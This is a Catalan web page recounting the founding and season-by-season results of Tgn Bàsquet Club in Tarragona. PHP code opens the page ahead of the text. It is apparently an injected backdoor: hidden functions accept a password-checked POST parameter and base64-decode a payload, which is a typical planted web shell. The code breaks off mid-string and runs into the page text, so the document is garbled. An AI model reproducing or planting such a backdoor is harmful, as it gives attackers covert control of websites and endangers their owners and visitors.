function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Història - Tgn Bàsquet Club -

Història

Com es crea el club? 

A través de la secció de bàsquet del Col·legi Sagrat Cor, juntament amb l’Associació de Pares del Col·legi i la direcció del Centre veuen les necessitats esportives i econòmiques que s’estan creant en els equips grans del col·legi, júniors i sèniors.

Es planteja la necessitat de crear aquesta nova entitat, sense ànim d’independència del col·legi. Ja que tota la direcció tècnica del Club haurà de fer-se càrrec dels equips de base del col·legi. Els equips escolars participaran com APA SAGRAT COR i els equips federats fins a cadets entressin en la disciplina de Club, anomenant-se els seus equips APA SAGRAT COR-TGN BÀSQUET i mantenint la indumentària del col·legi. Sent els equips júniors i sèniors els que la seva denominació serà únicament TGN BÀSQUET CLUB.

Per als equips júniors i sèniors del TGN BÀSQUET es crearà una indumentària nova i diferent.

Com es va escollir el nom? 

Durant el mes de Febrer de 2002, ens reunim diverses vegades els entrenadors del col·legi per acordar el nom del Club, van sorgir molts, variats i divertits com: Amics del bàsquet de Tarragona, Tarraco Bàsquet, Bàsquet Imperial, Club Bàsquet Tarraco, Escipions de Tarragona BC, entre d’altres.

Es va acordar el nom de TGN BÀSQUET. Es va realitzar la 1a reunió oficial formalitzant l’acta de Constitució del club el dia 1 de Març de 2002, es va presentar la documentació al Consell Català de l’Esport, sent retornada el 18 de Març, indicant-nos que havíem d’incloure la referencia “CLUB”. Es va organitzar una assemblea general de socis el dia 10 de Maig de 2002 i s’acorda el nom definitiu:

TGN BÀSQUET CLUB TARRAGONA

D’aquesta forma el dia 3 de Juny de 2002 es va realitzar la inscripció definitiva. Però consta com a data de constitució l’1 de Març de 2002. Aniversari del Club.

A partir d’aquí es comença a funcionar federativament com TGN BÀSQUET CLUB. Es traspassa l’equip sènior femení de l’APA SAGRAT COR al TGN BÀSQUET i a funcionar.

Els equips federats del col·legi pertanyen al CLUB, anomenant-se APA SAGRAT COR-TGN BÀSQUET.

Equips: Vam tenir un total de deu equips. En la nostra primera temporada tenim 4 equips (CLUB), sènior femení, es crea un sènior masculí i dos júnior femenins (un de preferent i un altre provincial). I 6 equips vinculats del col·legi: cadet femení 2n any, cadet femení 1r any, cadet masculí, infantil masculí, pre-infantil masculí i pre-infantil femení.

1r partit oficial: El nostre primer partit oficial com a nou Club es va disputar a Andorra. El dia 15 de setembre de 2002 a les 12.15 hores va jugar el nostre júnior preferent contra el CB ANDORRA.

Resultats: S’aconsegueixen els ascensos dels equips sèniors, el sènior femení ascendeix a 2a Nacional (que es denominarà 1a Catalana) i el sènior masculí ascendeix a 3a Catalana.

Primers dos equips sèniors que van aconseguir els ascensos.

Activitats: Ens integrem (més aviat no ens sortim) de la dinàmica del col·legi i s’organitza i participa en les 12 hores de bàsquet del col·legi. El Campus d’estiu ho organitza el TGN BÀSQUET.

Equipatge de joc: Més reunions per aconseguir i consensuar el color, tipus de roba… Hi havia dues opcions molt clares que no s’agafarien el blau i el vermell.

Fins l’any 2002 s’havia donat l’opció de jugar a bàsquet a les jugadores de més de 18 anys, però no hi havia equips masculins sèniors, tot i que comptava amb equips base d’ambdós sexes. A partir del 2002 els equips femenins i masculins sèniors van compartir trajectòria.

El 27 de maig del 2009, i veient que el bàsquet masculí està “saturat” entre els equips professionals del Club Bàsquet Tarragona i l’Associació Deportiva Torreforta, es presenta en societat el projecte de bàsquet femení que vol impulsar el nom de Tarragona dins del marc estatal del bàsquet en la seva part femenina; per aquest motiu l’any 2009 és l’últim de l’equip sènior masculí dins del club.

Temporada 2002-2003

En el seu primer any d’història, el primer equip masculí va assolir l’ascens a la Tercera Catalana des de la categoria provincial, amb un balanç de 25 victòries i 3 derrotes. Els integrants d’aquell primer conjunt van ser: Octavi Saumell, Marc Travé, Sergi Millan, Sancho Barbod, Miquel Pujol, Carlos González, David Olivé, Xavier Socías Benito, Xavier Socías Julbe, Miquel Moret, Marc Juanpera, Carles Ribas i Daniel Aperte. El primer entrenador va ser Francesc Cobo.

Paral·lelament, el sènior femení també va fer una gran temporada a Primera Catalana, acabant amb un balanç de 24 victòries i només 6 derrotes. Amb un equip molt jove i aquests números les noies van poder jugar el play-off d’ascens contra el Club Bàsquet Sant Boi, a qui van vèncer fent-se un lloc a la Segona Divisió Nacional. Algunes de les jugadores artífexs d’aquest ascens van ser: Montse Martí, Sílvia Mariné, Amèlia Buqueras, Irene Mallol, Eugenia Chillón, Deli Garachana, Roser Borrell, Anna Céster i Mónica Bueno i l’entrenador era Noé Monroy.

Temporada 2003-2004

La temporada següent, l’equip masculí va aconseguir un balanç de 21 triomfs i 9 derrotes, quedant en quarta posició de la classificació. Va jugar els play-off d’ascens, però no va aconseguir pujar de categoria.

La secció femenina també estrenava categoria, però una reestructuració de la Federació Catalana de Basquetbol va fer que la juguessin en una categoria amb el mateix nom que l’any anterior. El balanç no va ser l’òptim, 13 victòries i 17 derrotes, però contra tot pronostic van aconseguir la permanència.

Temporada 2004-2005

La tercera temporada d’existència va ser la de l’ascens a la Segona Catalana de l’equip masculí, després de sumar 20 victòries en 28 partits. Els jugadors d’aquell ascens van ser: Sergio Lou, Miquel Pujol, Octavi Saumell, Óscar Guillén, Enric Masip, Sancho Barbod, Marc Juanpera, Albert Garcia, Leo Olmedo, Lluís Escrichs i Álex Piñero. El tècnic era Sergio Lou.

Pel que fa a les noies, no van tenir la mateixa sort. Una mala temporada les va abocar al play-out de descens contra l’Associació Esportiva L’Hospitalet, amb qui van perdre la categoria.

Temporada 2005-2006

El sènior masculí va perdre la base que tants bons resultats havia donat, un fet que va comportar que l’equip perdés la categoria en la darrera jornada. El balanç va ser de 8 triomfs i 22 derrotes.

Afortunadament les jugadores col·legials van poder competir a Primera Catalana, ja que va quedar una plaça lliure i aquesta es va poder ocupar. Després d’un bon inici de temporada l’equip va rebre molts cops en forma de lesions i van acabar perdent una altra vegada la categoria.

Temporada 2006-2007

Els jugadors masculins no van tenir el retorn desitjat a la Tercera Catalana, ja que es va acabar en cinquena posició, amb 20 victòries i 10 derrotes.

El sènior femení va començar una nova etapa a la Segona Catalana. Va ser un any tranquil, sense patir en cap moment per la pèrdua de la categoria i sense tenir opcions d’ascens. Cal destacar que pràcticament tot el bloc era nou, cosa que indicava que l’equip s’estava “reformant”.

Temporada 2007-2008

Pel que fa al quadre col·legial masculí, pitjor van anar les coses l’any 2007-08, quan va salvar la categoria en el darrer partit del play-out de descens, després de guanyar a la pista del Club Bàsquet Blanes per 79-84.

Igualment que l’any anterior, les jugadores de l’equip femení van disputar la Segona Catalana, salvant la categoria amb solvència i mirant de més a prop les posicions capdavanteres.

Temporada 2008-2009

L’equip masculí va completar una acceptable competició finalitzant en 6a posició.

Millor sort van obtenir les noies que, fent una excel·lent segona volta havent perdut només un partit, van aconseguir un meritori tercer lloc que les va classificar per a jugar l’ascens a Primera Divisió Catalana.

Temporada 2009-2010

Un cop presentat el projecte de bàsquet femení es va eliminar l’equip sénior masculí. Les noies estrenaven categoria a Primera Catalana ocupant llocs mitjos de la taula durant tot el campionat. Un final de temporada irregular les va portar a jugar la promoció de permanència que van solventar mantenint-se a la categoria.

Temporada 2010-2011

La temporada pel primer equip començava amb un canvi d’entrenador. Mikel Polo es feia càrrec d’un equip amb diverses cares noves per a consolidar-se a la categoria. Després d’uns inicis molt incerts el primer equip va fer una gran segona volta guanyant a equips superiors, això va fer que acabéssin la temporada en una agradable cinquena posició.